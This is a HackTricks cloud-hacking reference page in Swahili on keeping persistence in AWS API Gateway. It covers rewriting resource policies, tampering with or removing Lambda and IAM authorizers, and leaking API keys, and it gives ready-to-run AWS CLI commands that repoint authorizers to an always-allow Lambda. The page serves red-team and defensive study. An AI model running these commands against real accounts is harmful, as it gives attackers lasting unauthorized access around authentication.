AWS - API Gateway Persistence

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

API Gateway

Kwa maelezo zaidi nenda kwenye:

AWS - API Gateway Enum

Resource Policy

Badilisha sera ya rasilimali ya API gateway(s) ili ujipe ufikiaji kwao

Badilisha Lambda Authorizers

Badilisha msimbo wa lambda authorizers ili ujipe ufikiaji kwa endpoints zote.
Au ondoa tu matumizi ya authorizer.

Ikiwa una ruhusa za control-plane za kuunda/kusasisha authorizer (REST API: aws apigateway update-authorizer, HTTP API: aws apigatewayv2 update-authorizer) unaweza pia kuielekeza tena authorizer kwa Lambda inayoruhusu kila wakati.

REST APIs (mabadiliko kwa kawaida yanahitaji deployment):

REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"

HTTP APIs / apigatewayv2 (mara nyingi huanza mara moja):

REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"

IAM Permissions

Ikiwa rasilimali inatumia IAM authorizer, unaweza kujipa ufikiaji kwa kubadilisha IAM permissions.
Au tu ondoa matumizi ya authorizer.

API Keys

Kama API keys zinatumiwa, unaweza leak hizo ili kudumisha persistence au hata kuunda mpya.
Au tu ondoa matumizi ya API keys.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.